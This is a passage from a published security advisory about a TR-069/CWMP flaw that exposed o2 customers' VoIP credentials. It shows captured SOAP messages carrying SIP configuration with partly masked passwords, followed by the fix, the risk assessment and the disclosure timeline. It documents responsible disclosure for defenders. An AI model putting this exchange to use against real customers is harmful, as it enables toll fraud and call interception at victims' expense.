xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158500</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg23] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158501</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[13]">
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Enable
</Name>
<Value xsi:type="xsd:string">Enabled</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.Enable
</Name>
<Value xsi:type="xsd:string">Enabled</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.X_AVM-DE_UseAuthUsername
</Name>
<Value xsi:type="xsd:boolean">0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.X_AVM-DE_CLIRType
</Name>
<Value xsi:type="xsd:int">5</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.PSTNFailOver
</Name>
<Value xsi:type="xsd:boolean">0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.DTMFMethod
</Name>
<Value xsi:type="xsd:string">RFC2833</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.OutboundProxy
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.UserAgentDomain
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.RegistrarServer
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.ProxyServer
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthPassword
</Name>
<Value xsi:type="xsd:string">0241463xxxxxxxxx</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.DirectoryNumber
</Name>
<Value xsi:type="xsd:string">463xxxxx</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthUserName
</Name>
<Value xsi:type="xsd:string">49241463xxxxx</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315850</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg24] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158501</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg25] CPE <- ACS B:
---------------------
[empty]
------------------------------------------------------------------------
Workaround
==========
o2 implemented countermeasures that prevent attackers from spoofing a
victim's IP address in CWMP messages. This prevents attackers from
retrieving arbitrary o2 customers' VoIP credentials.
Fix
===
The CPE needs to be properly authenticated when communicating with the
ACS. One option of doing so would be to provide the password of the DSL
connection. This password is already known to the CPE as it has been
entered manually by the customer during the initial setup process.
Security Risk
=============
This vulnerability allows the unauthorised usage of foreign VoIP
telephone numbers. The victim will be charged with all costs resulting
from fraudulent phone calls. Furthermore, an attacker may answer phone
calls on behalf of the victim. Customers have no means of defending
oneself from such an attack. Chances are that the attack will be
noticed only by customers who regularly check their invoice. The
vulnerability is therefore considered to pose a high risk.
Timeline
========
2014-09-08 - Potential vulnerability discovered
2014-09-20 - Vulnerability verified
2014-10-17 - ISP was notified about the vulnerability
2014-10-17 - ISP implemented first countermeasures
2014-10-24 - ISP wants to investigate further
2014-11-28 - ISP needs more time, depends on hardware manufacturer
2015-01-23 - ISP is still investigating, wants to permanently solve the
problem
2015-03-31 - ISP is still working on the problem, asks for more time
2015-06-12 - ISP wants to notify the proper German authorities about the
problem first while working on a solution
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,
BSI)
2016-01-08 - Advisory released
References
==========
[0] https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschftsfhrer: Patrick Hof, Jens Liebchen